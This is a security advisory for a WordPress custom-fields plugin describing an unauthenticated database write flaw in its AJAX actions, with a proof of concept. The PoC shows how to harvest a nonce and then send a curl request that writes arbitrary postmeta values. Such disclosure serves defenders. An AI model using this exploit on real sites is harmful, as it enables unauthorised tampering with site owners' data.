WCK – Custom Fields and Custom Post Types Creator [Unauthorized DB Access]

Description

WordPress plugin WCK – Custom Fields and Custom Post Types Creator suffers from unathorized DB access vulnerability. An attacker can exploit the wck_add_form{$this->args['meta_name']} and wck_add_meta{$this->args['meta_name']} actions to insert arbitrary data to database or update existing values.

If the attack is successful then the attacker can insert data or update values in postmeta DB table even without a valid acount, as these actions are available to anyone through the wp_ajax_nopriv actions.

PoC

First the attacker must acquire a nonce value for wck-add-meta action. This is possible by using the action action=wck_add_formwck_cfc_fields because action wck_add_form{$this->args['meta_name']} is available to non-privileged users:
http://example.com/wp-admin/admin-ajax.php?action=wck_add_formwck_cfc_fields

The response is a form that contains the nonce in .button-primary link, eg:

<a href="javascript:void(0)" class="button-primary" 
    onclick="addMeta('', '', 'f76ddf7b16')">
    <span>Add Entry</span>
</a>

With this nonce the attacker can exploit the
wck_add_meta{$this->args['meta_name']} action to modify post meta directly
in DB, eg:

POST_ID=1
ACTION=wck_add_metawck_cfc_args
META_KEY="_meta_key_"
META_VALUE="pwnd"
NONCE="f76ddf7b16"

curl -d "_wpnonce=${NONCE}&action=${ACTION}&meta=${META_KEY}&values=${META_VALUE}&id=${POST_ID}" \
    "http://example.com/wp-admin/admin-ajax.php"